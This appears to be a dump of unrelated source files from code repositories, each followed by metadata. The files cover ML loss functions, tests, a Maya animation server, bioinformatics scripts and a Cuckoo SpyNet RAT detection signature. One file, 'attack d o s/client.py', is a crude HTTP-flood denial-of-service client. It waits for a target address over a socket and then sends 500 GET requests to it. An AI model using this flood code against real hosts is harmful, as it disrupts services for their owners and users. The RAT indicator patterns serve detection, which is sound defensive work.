# Compute true positives from view
local_pos = tf.matmul(tf.reshape(q, [N, 1, C]), tf.reshape(k, [N, C, 1]))
local_pos = tf.reshape(local_pos, [N, 1]) / temperature
local_labels = tf.range(N, dtype=tf.int32)
joint_expectation = tf.reduce_sum(local_pos, axis=1)
# Compute true normalization
logits = tf.matmul(q, tf.transpose(queue)) / temperature
expectations_marginal_per_sample = tf.reduce_logsumexp(logits, axis=1)
# Neighborhood terms
# Neighborhood positives for aggregation
neighbors_mask = neigh_func(n_l, n_labels_queues)
number_neigh = tf.reduce_sum(neighbors_mask, axis=1)
neighbors_expectation = tf.reduce_sum(logits * neighbors_mask, axis=1) / number_neigh
aggregation_loss = tf.reduce_mean(expectations_marginal_per_sample - neighbors_expectation)
# Neighborhood negatives for discrimination
expectations_neighborhood_per_sample = tf.math.log(
tf.reduce_sum(tf.math.exp(logits) * neighbors_mask, axis=1))
n_X_ent_per_sample = expectations_neighborhood_per_sample - joint_expectation
disc_loss = tf.reduce_mean(n_X_ent_per_sample)
loss = alpha * aggregation_loss + (1.0 - alpha) * disc_loss
# Computing the contrastive accuracy
preds = tf.transpose(tf.argmax(tf.squeeze(logits), axis=1, output_type=tf.int32))
correct_preds = (preds == local_labels)
accuracy = tf.reduce_mean(tf.cast(tf.expand_dims(correct_preds, axis=0), tf.float32))
return loss, aggregation_loss, disc_loss, accuracy
# Neighborhood Functions
@gin.configurable('get_neighbors_mask_temporal')
def get_neighbors_mask_temporal(samples, queue, threshold=8):
"""Neighborhood function to aggregate samples from same same patient with w hours.
Args:
samples: Tensor with samples labels (N, L).
queue: Tensor with queue labels (K, L).
threshold: Integer with max temporal distance between neighbors.
Returns:
Mask with the shape (N, K)
"""
N = samples.shape[0]
K = queue.shape[0]
a_n, a_t = tf.split(tf.tile(tf.reshape(samples, (N, 1, -1)), (1, K, 1)), 2, axis=-1)
b_n, b_t = tf.split(tf.tile(tf.reshape(queue, (1, K, -1)), (N, 1, 1)), 2, axis=-1)
t_n = a_n - b_n
t_t = tf.abs(a_t - b_t)
c = tf.math.logical_and((t_n == 0), (t_t <= threshold))
return tf.cast(c[:, :, 0], dtype=tf.float32)
@gin.configurable('get_neighbors_dt_multiclass')
def get_neighbors_dt_label_multiclass(samples, queue):
"""Neighborhood function to aggregate samples with same downstrean task label.
Args:
samples: Tensor with samples labels (N, L).
queue: Tensor with queue labels (K, L).
Returns:
Mask with the shape (N, K)
"""
N = samples.shape[0]
K = queue.shape[0]
a_n = tf.tile(tf.reshape(samples, (N, 1, -1)), (1, K, 1))
b_n = tf.tile(tf.reshape(queue, (1, K, -1)), (N, 1, 1))
t_n = a_n - b_n
c = tf.cast((t_n == 0), dtype=tf.float32)[:, :, 0] + tf.linalg.diag(tf.ones(N), num_rows=N, num_cols=K)
return tf.cast(c >= 1, dtype=tf.float32)
@gin.configurable('get_neighbors_nascl_label_multiclass')
def get_neighbors_nascl_label_multiclass(samples, queue, threshold=8, joint='intersection'):
"""Neighborhood function to aggregate samples from same patient with w hours and/or with same DT label.
Args:
samples: Tensor with samples labels (N, L).
queue: Tensor with queue labels (K, L).
threshold: Integer with max temporal distance between neighbors.
joint: String either 'intersection' or 'union' to determine how to aggregate the two neighborhoods.
Returns:
Mask with the shape (N, K)
"""
samples_dt, samples_patient = tf.split(samples, [1, 2], axis=-1)
queue_dt, queue_patient = tf.split(queue, [1, 2], axis=-1)
neigh_dt = get_neighbors_dt_label_multiclass(samples_dt, queue_dt)
neigh_patient = get_neighbors_mask_temporal(samples_patient, queue_patient, threshold=threshold)
if joint == 'intersection':
return neigh_dt * neigh_patient
elif joint == 'union':
return tf.cast((neigh_patient + neigh_dt >= 1), dtype=tf.float32)
| 6,271 |
celery/execute/__init__.py
|
amplify-education/celery
| 1 |
2173034
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .. import current_app
from ..utils import deprecated
send_task = current_app.send_task
@deprecated(removal="2.3", alternative="Use task.apply_async() instead.")
def apply_async(task, *args, **kwargs):
"""*[Deprecated]* Use `task.apply_async()`"""
return task.apply_async(*args, **kwargs)
@deprecated(removal="2.3", alternative="Use task.apply() instead.")
def apply(task, *args, **kwargs):
"""*[Deprecated]* Use `task.apply()`"""
return task.apply(*args, **kwargs)
@deprecated(removal="2.3",
alternative="Use registry.tasks[name].delay instead.")
def delay_task(task, *args, **kwargs):
from ..registry import tasks
return tasks[task].apply_async(args, kwargs)
| 772 |
attack d o s/client.py
|
Marzooq13579/Hack-Gadgets
| 8 |
2172795
|
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: pat
#
# Created: 13/06/2013
# Copyright: (c) pat 2013
# Licence: <your licence>
#------------------------------------------- =------------------------------------
import socket
import os
import re
host = ''
port = 1234
backlog = 5
size = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(port)
while 1:
client, address = s.accept()
data = client.recv(size)
if data:
data3 = repr(data)
data2 = re.sub("b", "", data3)
data4 = re.sub("'", "", data2)
#print (data4) for debuuging
client.close()
def HTTPFlood():
#pid = os.fork()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock .connect((data4, 80))
sock.send("GET / HTTP/1.1\r\n")
sock.send("Host: localhost\r\n\r\n");
sock.close()
for i in range(1, 500):
HTTPFlood()
| 1,059 |
tests/test_environment_store.py
|
damycra/dj_secret_settings
| 1 |
2173177
|
from json.decoder import JSONDecodeError
from typing import Mapping, Sequence
from dj_secret_settings.settings_store import DoNotCoerceBool
import pytest
from os import environ
from dj_secret_settings.stores.from_environment import EnvironmentSettingsStore
@pytest.mark.parametrize(
["mocker", "data", "expected"],
[
("mocker", {"key": "foo"}, "foo"),
("mocker", {"key": "true"}, "true"),
("mocker", {"key": "false"}, "false"),
("mocker", {"key": "33"}, "33"),
],
indirect=["mocker"],
)
def test_value_returned_if_present(mocker, data, expected):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("key") == expected
def test_none_returned_if_no_key_or_default(mocker):
mocker.patch.dict(environ, {"key": "foo"})
store = EnvironmentSettingsStore()
assert store.get_value("key2") is None
@pytest.mark.parametrize(
["mocker", "data", "expected"],
[
("mocker", {"key": "foo"}, "foo"),
("mocker", {"key": "bar", "k2": "foo"}, "bar"),
],
indirect=["mocker"],
)
def test_default_not_returned_if_present(mocker, data, expected):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("key", "should not be returned") == expected
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "foo"}),
("mocker", {"key": "bar", "k2": "foo"}),
],
indirect=["mocker"],
)
def test_default_returned_if_not_present(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("non-key", "dflt") == "dflt"
def test_bool_coerce_throws_error(mocker):
mocker.patch.dict(environ, {"key": "foo"})
store = EnvironmentSettingsStore()
with pytest.raises(DoNotCoerceBool):
store.get_value("key", coerce_type=bool)
@pytest.mark.parametrize(
["mocker", "data", "coerce", "expected"],
[
("mocker", {"key": "10"}, str, "10"),
("mocker", {"key": "11"}, int, 11),
("mocker", {"key": "list"}, list, ["l", "i", "s", "t"]),
],
indirect=["mocker"],
)
def test_coerce_works(mocker, data, coerce, expected):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_value("key", coerce_type=coerce) == expected
@pytest.mark.parametrize(
["mocker", "data", "coerce"],
[
("mocker", {"key": "nan"}, int),
("mocker", {"key": "[1,2,3]"}, float),
],
indirect=["mocker"],
)
def test_coerce_throws_error(mocker, data, coerce):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
with pytest.raises(Exception):
store.get_value("key", coerce_type=coerce)
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "true"}),
("mocker", {"key": "1"}),
("mocker", {"key": "on"}),
("mocker", {"key": "yes"}),
],
indirect=["mocker"],
)
def test_true_string_evaluates_true(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_bool("key") == True
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "false"}),
("mocker", {"key": "0"}),
("mocker", {"key": "no"}),
("mocker", {"key": "off"}),
("mocker", {"key": "anything"}),
],
indirect=["mocker"],
)
def test_false_string_evaluates_false(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
assert store.get_bool("key", default=True) == False
def test_map_returned(mocker):
mocker.patch.dict(environ, {"key": '{"map_key": 100}'})
store = EnvironmentSettingsStore()
value = store.get_mapping("key")
assert isinstance(value, Mapping)
assert value["map_key"] == 100
def test_missing_map_key_returns_none():
store = EnvironmentSettingsStore()
assert store.get_mapping("non-key") is None
def test_non_map_default_raises_error():
store = EnvironmentSettingsStore()
with pytest.raises(TypeError):
store.get_mapping("key", [1, 2, 3])
def test_non_mapping_raises_error(mocker):
mocker.patch.dict(environ, {"key": "text"})
store = EnvironmentSettingsStore()
with pytest.raises((TypeError, JSONDecodeError)):
store.get_mapping("key")
def test_list_returned(mocker):
mocker.patch.dict(environ, {"key": "[1,2,3]"})
store = EnvironmentSettingsStore()
value = store.get_array("key")
assert isinstance(value, Sequence)
assert value[1] == 2
def test_missing_list_key_returns_none():
store = EnvironmentSettingsStore()
assert store.get_array("non-key") is None
def test_non_list_default_raises_error():
store = EnvironmentSettingsStore()
with pytest.raises(TypeError):
store.get_array("key", "non list")
@pytest.mark.parametrize(
["mocker", "data"],
[
("mocker", {"key": "text"}),
("mocker", {"key": "{}"}),
],
indirect=["mocker"],
)
def test_non_array_raises_error(mocker, data):
mocker.patch.dict(environ, data)
store = EnvironmentSettingsStore()
with pytest.raises((TypeError, JSONDecodeError)):
store.get_array("key")
| 5,279 |
selenium_tests/broken_image_check.py
|
WesleyHindle/the-internet
| 0 |
2171355
|
from selenium import webdriver #Libraries needed
from selenium.webdriver.common.keys import Keys #This gives you access to keys you so you can use things like the esc or return key. This is different to being able to type.
import time #Here we use this to delay selenium from executing by the number of seconds specified.
import requests #This allows us to send requests to URLs
#from requests.exceptions import MissingSchema, InvalidSchema, InvalidURL
driver = webdriver.Chrome("/Users/Student/Downloads/chromedriver")
# driver.get("http://the-internet.herokuapp.com/broken_images")
# image_list = driver.find_element_by_xpath('/html/body/div[2]/div/div/img[1]') #You're selecting specifically which image you want to check if it's broken or not
# response = requests.get(image_list.get_attribute('src'), stream=True) #This checks the url of the image
# if (response.status_code != 200): #If the response code for image is NOT 200 then the image is not broken. Other issues could cause it not to display though.
# print("Image is broken")
# driver.quit()
#########################
###Searching through all images on a page
driver.get("http://the-internet.herokuapp.com/broken_images")
iBrokenImageCount = 0
image_list = driver.find_elements_by_tag_name("img") #This finds every image on the pages and stores in a list
print('Total number of images on is ' + str(len(image_list))) #Just for demo purposes
for img in image_list: #Searches through each image in the list
response = requests.get(img.get_attribute('src'), stream=True) #src holds the URL the image is stored on
if (response.status_code != 200): #This URL is then checked for its status code.
print(img.get_attribute('outerHTML') + " is broken.")
iBrokenImageCount = (iBrokenImageCount + 1)
print(f"The number of broken images is {iBrokenImageCount}")
| 1,940 |
insights/parsers/tests/test_sysconfig_docker.py
|
mglantz/insights-core
| 121 |
2173267
|
from insights.parsers.sysconfig import DockerSysconfig
from insights.tests import context_wrap
DOCKER_SYSCONFIG_STD = """
# /etc/sysconfig/docker
# Modify these options if you want to change the way the docker daemon runs
OPTIONS='--selinux-enabled'
DOCKER_CERT_PATH=/etc/docker
# If you want to add your own registry to be used for docker search and docker
# pull use the ADD_REGISTRY option to list a set of registries, each prepended
# with --add-registry flag. The first registry added will be the first registry
# searched.
ADD_REGISTRY='--add-registry registry.access.redhat.com'
# If you want to block registries from being used, uncomment the BLOCK_REGISTRY
# option and give it a set of registries, each prepended with --block-registry
# flag. For example adding docker.io will stop users from downloading images
# from docker.io
# BLOCK_REGISTRY='--block-registry'
# If you have a registry secured with https but do not have proper certs
# distributed, you can tell docker to not look for full authorization by
# adding the registry to the INSECURE_REGISTRY line and uncommenting it.
# INSECURE_REGISTRY='--insecure-registry'
# On an SELinux system, if you remove the --selinux-enabled option, you
# also need to turn on the docker_transition_unconfined boolean.
# setsebool -P docker_transition_unconfined 1
# Location used for temporary files, such as those created by
# docker load and build operations. Default is /var/lib/docker/tmp
# Can be overriden by setting the following environment variable.
# DOCKER_TMPDIR=/var/tmp
# Controls the /etc/cron.daily/docker-logrotate cron job status.
# To disable, uncomment the line below.
# LOGROTATE=false
"""
def test_standard_content():
context = context_wrap(DOCKER_SYSCONFIG_STD, 'etc/sysconfig/docker')
sysconf = DockerSysconfig(context)
assert sorted(sysconf.keys()) == sorted(['OPTIONS', 'DOCKER_CERT_PATH', 'ADD_REGISTRY'])
assert 'OPTIONS' in sysconf
assert sysconf['OPTIONS'] == '--selinux-enabled'
assert sysconf.options == '--selinux-enabled'
assert 'DOCKER_CERT_PATH' in sysconf
assert sysconf['DOCKER_CERT_PATH'] == '/etc/docker'
assert 'ADD_REGISTRY' in sysconf
assert sysconf['ADD_REGISTRY'] == '--add-registry registry.access.redhat.com'
assert sysconf.unparsed_lines == []
| 2,303 |
bellparallel/bellparallel/__init__.py
|
FabianBell/Packages
| 0 |
2172395
|
from multiprocessing import Pool
from multiprocessing import current_process
from tqdm import tqdm
from functools import wraps
import ctypes
CNX_INDI = '_cnx_'
def _exe_function(entry):
adress, data = entry
func = ctypes.cast(adress, ctypes.py_object).value
if isinstance(data, tuple) and len(data) == 2 and isinstance(data[0], str) and data[0] == CNX_INDI and isinstance(data[1], tuple):
adress, data = data[1]
cnx = ctypes.cast(adress, ctypes.py_object).value
return func(cnx, data)
return func(data)
def _pack(address):
"""
Adds the memory address to the data entry
"""
def _pack_entry(entry):
return address, entry
return _pack_entry
def parallel(nproz=4, tag=None):
"""
Function wrapper to run the function code on each
element of the input list in parallel.
"""
def run_parallel(func):
@wraps(func)
def run(*data, length=None):
if len(data) == 1:
data = data[0]
elif len(data) == 2 and func.__name__ != func.__qualname__:
# requires context
address = id(data[0])
# set length since we want to use generator
length = len(data[1]) if length is None else length
data = map(_pack(address), data[1])
# add context indicator
data = map(_pack(CNX_INDI), data)
else:
raise ValueError('Invalid function specification or arguments')
address = id(func)
iterator = map(_pack(address), data)
with Pool(nproz) as pool:
length = len(data) if length is None else length
res = list(tqdm(
pool.imap(_exe_function, iterator),
total=length,
desc=tag
))
return res
return run
return run_parallel
| 1,939 |
modules/signatures/windows/rat_spynet.py
|
Yuanmessi/Bold-Falcon
| 24 |
2172939
|
# Copyright (C) 2014 @threatlead
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class SpynetRat(Signature):
name = "rat_spynet"
description = "Creates known SpyNet files, registry changes and/or mutexes."
severity = 3
categories = ["rat"]
families = ["spynet"]
authors = ["threatlead", "nex", "RedSocks"]
minimum = "2.0"
references = [
"https://malwr.com/analysis/ZDQ1NjBhNWIzNTdkNDRhNjhkZTFmZTBkYTU2YjMwNzg/",
"https://malwr.com/analysis/MjkxYmE2YzczNzcwNGJiZjljNDcwMzA2ZDkyNDU2Y2M/",
"https://malwr.com/analysis/N2E3NWRiNDMyYjIwNGE0NTk3Y2E5NWMzN2UwZTVjMzI/",
"https://malwr.com/analysis/N2Q2NWY0Y2MzOTM0NDEzNmE1MTdhOThiNTQxMzhiNzk/",
]
mutexes_re = [
".*CYBERGATEUPDATE",
".*\(\(SpyNet\)\).*",
".*Spy-Net.*",
".*Spy.*Net.*Instalar",
".*Spy.*Net.*Persist",
".*Spy.*Net.*Sair",
".*X_PASSWORDLIST_X.*",
".*X_BLOCKMOUSE_X.*",
# ".*PERSIST", # Causes false positive detection on XtremeRAT samples.
".*_SAIR",
".*SPY_NET_RATMUTEX",
".*xXx.*key.*xXx",
".*Administrator15",
".*Caracas",
".*Caracas_PERSIST",
".*Pluguin",
".*Pluguin_PERSIST",
".*Pluguin_SAIR",
".*MUT1EX.*",
]
regkeys_re = [
".*\\SpyNet\\.*",
]
files_re = [
".*XX--XX--XX.txt",
".*\\\\Spy-Net\\\\server.exe",
".*\\\\Spy-Net\\\\Spy-Net.dll",
".*\\\\Spy-Net\\\\keylog.dat",
".*\\\\Spy-Net",
]
def on_complete(self):
for indicator in self.mutexes_re:
mutex = self.check_mutex(pattern=indicator, regex=True)
if mutex:
self.mark_ioc("mutex", mutex)
for indicator in self.regkeys_re:
regkey = self.check_key(pattern=indicator, regex=True)
if regkey:
self.mark_ioc("registry", regkey)
for indicator in self.files_re:
regkey = self.check_file(pattern=indicator, regex=True)
if regkey:
self.mark_ioc("file", regkey)
return self.has_marks()
| 2,789 |
pipeline/Step1/pd_forward_bert.py
|
JunnYu/BERT-SST2-Prod
| 1 |
2172740
|
import numpy as np
import paddle
from paddlenlp.transformers import BertForSequenceClassification
from reprod_log import ReprodLogger
if __name__ == "__main__":
paddle.set_device("cpu")
# def logger
reprod_logger = ReprodLogger()
model = BertForSequenceClassification.from_pretrained(
"bert-base-uncased", num_classes=2)
classifier_weights = paddle.load(
"../classifier_weights/paddle_classifier_weights.bin")
model.load_dict(classifier_weights)
model.eval()
# read or gen fake data
fake_data = np.load("../fake_data/fake_data.npy")
fake_data = paddle.to_tensor(fake_data)
# forward
out = model(fake_data)
#
reprod_logger.add("logits", out.cpu().detach().numpy())
reprod_logger.save("forward_paddle.npy")
| 784 |
bin/generate_isoforms_fusion_FDR.py
|
gaofeng21cn/IDP-fusion
| 4 |
2172811
|
#!/usr/bin/python
import sys
import re
import string
#from constants import *
import re
### Store fusion gene information from MLE input file
#########
def get_fusion_genomes(input_filename, isoforms_name_filename):
MLE_input_dict = dict()
isoforms_names_ls = []
isoforms_single_names_ls = []
isoforms_name_file = open(isoforms_name_filename, 'r')
for line in isoforms_name_file:
if ("/" in line):
isoforms_single_names_ls += line.strip().split("/")
isoforms_names_ls.append(line.strip())
isoforms_name_file.close()
num_reads = 0
input_file = open(input_filename, 'r')
line_index = 0;
wr_flag = False
for line in input_file:
fields = line.split()
if (line_index == 0):
gname = fields[0]
num_isoforms = int(fields[1])
rname = fields[2]
prev_line = line
elif (line_index == 1):
for isoform in line.strip().split():
if (isoform in isoforms_names_ls):
MLE_input_dict[gname] = []
MLE_input_dict[gname].append(prev_line)
wr_flag = True
break
line_index += 1
if (wr_flag):
MLE_input_dict[gname].append(line.strip())
if (line_index == (9 + num_isoforms)):
line_index = 0
wr_flag = False
input_file.close()
# Keep region with supporting isoforms
gnames = MLE_input_dict.keys()
for gname in gnames:
isoforms_ls = MLE_input_dict[gname][1].strip().split()
isoforms_flag_ls = [(i in isoforms_names_ls) for i in isoforms_ls]
num_isoforms = len(isoforms_ls)
num_regions = len(MLE_input_dict[gname][6].strip().split())
regions_flag_ls = [0] * num_regions
for isoform_idx in range(num_isoforms):
if (isoforms_flag_ls[isoform_idx]):
line_ls = [int(i) for i in MLE_input_dict[gname][7 + isoform_idx].strip().split()]
regions_flag_ls = [regions_flag_ls[i] + line_ls[i] for i in range(num_regions)]
for line_idx in [6, 8 + isoform_idx, 9 + isoform_idx]:
line_ls = MLE_input_dict[gname][line_idx].strip().split()
new_line_ls = [line_ls[i] for i in range(num_regions) if regions_flag_ls[i] > 0]
MLE_input_dict[gname][line_idx] = "\t".join(new_line_ls)
# Update region columns
for isoform_idx in range(num_isoforms-1, -1, -1):
if (isoforms_flag_ls[isoform_idx]):
line_ls = MLE_input_dict[gname][7 + isoform_idx].strip().split()
new_line_ls = [line_ls[i] for i in range(num_regions) if regions_flag_ls[i] > 0]
MLE_input_dict[gname][7 + isoform_idx] = "\t".join(new_line_ls)
else:
del MLE_input_dict[gname][7 + isoform_idx]
# Update list of isoforms
isoforms_ls = MLE_input_dict[gname][1].strip().split()
for line_idx in [1, 2, 3]:
line_ls = MLE_input_dict[gname][line_idx].strip().split()
new_line_ls = [line_ls[i] for i in range(num_isoforms) if isoforms_ls[i] in isoforms_names_ls]
MLE_input_dict[gname][line_idx] = "\t".join(new_line_ls)
# Update number of isoforms
line_ls = MLE_input_dict[gname][0].strip().split()
line_ls[1] = str(sum(isoforms_flag_ls))
MLE_input_dict[gname][0] = "\t".join(line_ls)
num_reads_ls = [int(i) for i in MLE_input_dict[gname][-1].strip().split()]
num_reads += sum(num_reads_ls)
return [MLE_input_dict, isoforms_single_names_ls, num_reads]
def print_MLE_input_file(input_filename, output_filename,
isoforms_names_filename, MLE_input_dict, num_reads):
input_file = open(input_filename, 'r')
output_file = open(output_filename, 'w')
num_reads_origin = int(input_file.readline())
output_file.write(str(num_reads_origin + num_reads) + "\n")
for line in input_file:
output_file.write(line)
fusion_gene_names_ls = MLE_input_dict.keys()
for fusion_gname in fusion_gene_names_ls:
for fusion_line in MLE_input_dict[fusion_gname]:
output_file.write(fusion_line.strip() + '\n')
input_file.close()
output_file.close()
def print_predicted_gpd_file(input_gpd_filename, output_gpd_filename, isoforms_names_ls):
input_gpd_file = open(input_gpd_filename, 'r')
output_gpd_file = open(output_gpd_filename, 'w')
print isoforms_names_ls
for line in input_gpd_file:
fields = line.split()
if ((fields[1][:-2]) in isoforms_names_ls):
output_gpd_file.write(line)
input_gpd_file.close()
output_gpd_file.close()
### Main
##########
def main():
fusion_parseSAM_filename = sys.argv[1]
selected_fusion_isoforms_filename = sys.argv[2]
input_parseSAM_filename = sys.argv[3]
output_parseSAM_filename = sys.argv[4]
input_gpd_filename = sys.argv[5]
output_gpd_filename = sys.argv[6]
[MLE_input_dict, isoforms_names_ls, num_reads] = get_fusion_genomes(fusion_parseSAM_filename, selected_fusion_isoforms_filename)
print_MLE_input_file(input_parseSAM_filename, output_parseSAM_filename, selected_fusion_isoforms_filename,
MLE_input_dict, num_reads)
print_predicted_gpd_file(input_gpd_filename, output_gpd_filename, isoforms_names_ls)
if __name__ == '__main__':
main()
| 5,611 |
src/mains/main.py
|
MohamedAli1995/Virgin-Airline-Tweets-Sentiment-Prediction
| 1 |
2172448
|
import tensorflow as tf
from src.data_loader.data_generator import DataGenerator
from src.models.sentiment_model import SentimentModel
from src.trainers.sentiment_trainer import SentimentTrainer
from src.testers.sentiment_tester import SentimentTester
from src.utils.config import processing_config
from src.utils.logger import Logger
from src.utils.utils import get_args
from src.utils.utils import print_predictions
def main():
args = None
config = None
try:
# args = get_args()
# config = processing_config(args.config)
config = processing_config(
"/media/syrix/programms/projects/Virgin-Airline-Tweets-Sentiment-Prediction/configs/config_model.json")
except:
print("Missing or invalid arguments")
exit(0)
sess = tf.Session()
logger = Logger(sess, config)
model = SentimentModel(config)
model.load(sess)
# if args.input_text is not None:
# data = DataGenerator(config, training=False)
# data.load_test_set([args.input_text])
# tester = SentimentTester(sess, model, data, config, logger)
# predictions = tester.predict()
# print_predictions(predictions)
# return
data = DataGenerator(config, training=True)
trainer = SentimentTrainer(sess, model, data, config, logger)
trainer.train()
tester = SentimentTester(sess, model, data, config, logger)
tester.test()
if __name__ == '__main__':
main()
| 1,464 |
pyqlc/utils/exceptions.py
|
realForbis/pyqlc
| 0 |
2172171
|
from ed25519_blake2b import BadSignatureError
__all__ = (
"InvalidPrivateKey", "InvalidSeed", "InvalidAccount", "InvalidPublicKey",
"BadSignatureError", "InvalidQLCAddress", "InvalidSignature", "InvalidBlock",
"InvalidWork", "InvalidDifficulty", "InvalidMultiplier", "InvalidBlockHash",
"InvalidBalance"
)
class InvalidPrivateKey(ValueError):
"""The QLC private key is invalid."""
class InvalidQLCAddress(ValueError):
"""The QLC adress is invalid."""
class InvalidSeed(ValueError):
"""The seed is invalid."""
class InvalidAccount(ValueError):
"""The QLC account ID is invalid."""
class InvalidPublicKey(ValueError):
""""The QLC public key is invalid."""
class InvalidSignature(BadSignatureError):
"""The given signature is invalid."""
class InvalidBlock(ValueError):
"""The block is invalid."""
class InvalidWork(ValueError):
"""The given work is invalid."""
class InvalidDifficulty(ValueError):
"""The given work difficulty is invalid."""
class InvalidMultiplier(ValueError):
"""The given work multiplier is invalid."""
class InvalidBlockHash(ValueError):
"""The given block hash is invalid."""
class InvalidBalance(ValueError):
"""The given balance is invalid."""
| 1,242 |
tpRigToolkit/tools/romgenerator/dccs/maya/server.py
|
tpRigToolkit/tpRigToolkit-tools-romgenerator
| 0 |
2172802
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains tpRigToolkit-tools-romgenerator server implementation for Maya
"""
import maya.cmds
from tpDcc import dcc
from tpDcc.core import server
class RomGeneratorServer(server.DccServer, object):
PORT = 45322
def get_scene_joints(self, data, reply):
long_joints = dcc.list_nodes(node_type='joint', full_path=True)
short_joints = [dcc.node_short_name(joint) for joint in long_joints]
joints_uuids = [dcc.node_handle(joint) for joint in long_joints]
reply['result'] = {'names': short_joints, 'handles': joints_uuids}
reply['success'] = True
def get_selected_joints(self, data, reply):
long_joints = dcc.selected_nodes_of_type(node_type='joint', full_path=True)
joints_uuids = [dcc.node_handle(joint) for joint in long_joints]
reply['result'] = joints_uuids
reply['success'] = True
@dcc.undo_decorator()
def generate_rom(self, data, reply):
rom_data = data.get('rom_data', dict())
if not rom_data:
reply['success'] = False
reply['msg'] = 'No ROM data given'
return
try:
joint_handles = rom_data['joint_handles']
rotate_x = rom_data['rotate_x']
rotate_y = rom_data['rotate_y']
rotate_z = rom_data['rotate_z']
solve_as_one_item = rom_data['solve_as_one_item']
frame_interval = rom_data['frame_interval']
start_frame = rom_data['start_frame']
anim_length = rom_data['anim_length']
except Exception as exc:
reply['success'] = False
reply['msg'] = 'ROM data is not valid: {}'.format(exc)
return
# retrieve joints from UUIDs
joints = [dcc.find_node_by_id(joint_id, full_path=True) for joint_id in joint_handles]
joints = [joint for joint in joints if joint and dcc.node_exists(joint)]
# set timeline and swipe existing keys
dcc.set_active_frame_range(0, start_frame + anim_length)
# swipe existing keys
maya.cmds.cutKey(joints, time=(-100, anim_length * 10), option='keys')
maya.cmds.setKeyframe(joints, t=start_frame)
time = start_frame
if solve_as_one_item:
rotation_values = (0, 30, -30, 0)
if rotate_x:
for value in rotation_values:
maya.cmds.currentTime(time)
for joint in joints:
for axis in 'XYZ':
rotation_value = value if axis == 'X' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_y:
for value in rotation_values:
maya.cmds.currentTime(time)
for joint in joints:
for axis in 'XYZ':
rotation_value = value if axis == 'Y' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_z:
for value in rotation_values:
maya.cmds.currentTime(time)
for joint in joints:
for axis in 'XYZ':
rotation_value = value if axis == 'Z' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
else:
rotation_values = (0, 90, -90, 0)
if rotate_x:
for joint in joints:
for value in rotation_values:
maya.cmds.currentTime(time)
for axis in 'XYZ':
rotation_value = value if axis == 'X' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_y:
for joint in joints:
for value in rotation_values:
maya.cmds.currentTime(time)
for axis in 'XYZ':
rotation_value = value if axis == 'Y' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
if rotate_z:
for joint in joints:
for value in rotation_values:
maya.cmds.currentTime(time)
for axis in 'XYZ':
rotation_value = value if axis == 'Z' else 0
dcc.set_attribute_value(joint, 'rotate{}'.format(axis), rotation_value)
maya.cmds.setKeyframe('{}.rotate'.format(joint))
time = time + frame_interval
reply['success'] = True
def clear_rom(self, data, reply):
joint_handles = data.get('joint_handles', list())
if not joint_handles:
reply['success'] = False
reply['msg'] = 'No joint selected to clear ROM data from'
return
# retrieve joints from UUIDs
joints = [dcc.find_node_by_id(joint_id, full_path=True) for joint_id in joint_handles]
joints = [joint for joint in joints if joint and dcc.node_exists(joint)]
maya.cmds.currentTime(0)
maya.cmds.cutKey(joints, time=(-10000, 10000), option="keys")
reply['success'] = True
| 6,058 |
tests/test_document.py
|
alkemics/panda
| 13 |
2172338
|
import pytest
from pandagg import Mappings
from pandagg.document import InnerDocSource, DocumentSource
from pandagg.mappings import Text, Long, Date, Keyword, Object, Nested
from pandagg.node.mappings import Boolean
class User(InnerDocSource):
id: int = Long(required=True)
signed_up: str = Date()
username: str = Text(fields={"keyword": Keyword()}, required=True, multiple=False)
email = Text(fields={"keyword": Keyword()})
location = Text(fields={"keyword": Keyword()})
class Comment(InnerDocSource):
author = Object(properties=User, required=True)
created = Date(required=True)
content = Text(required=True)
class Post(DocumentSource):
author = Object(properties=User, required=True)
created = Date(required=True)
body = Text(required=True)
comments = Nested(properties=Comment, multiple=True)
def test_document_init():
user = User(id=1, signed_up="2021-01-01")
assert user.id == 1
assert user.signed_up == "2021-01-01"
assert isinstance(user._mappings_, Mappings)
assert user._mappings_.to_dict() == {
"properties": {
"email": {"fields": {"keyword": {"type": "keyword"}}, "type": "text"},
"id": {"type": "long"},
"location": {"fields": {"keyword": {"type": "keyword"}}, "type": "text"},
"signed_up": {"type": "date"},
"username": {"fields": {"keyword": {"type": "keyword"}}, "type": "text"},
}
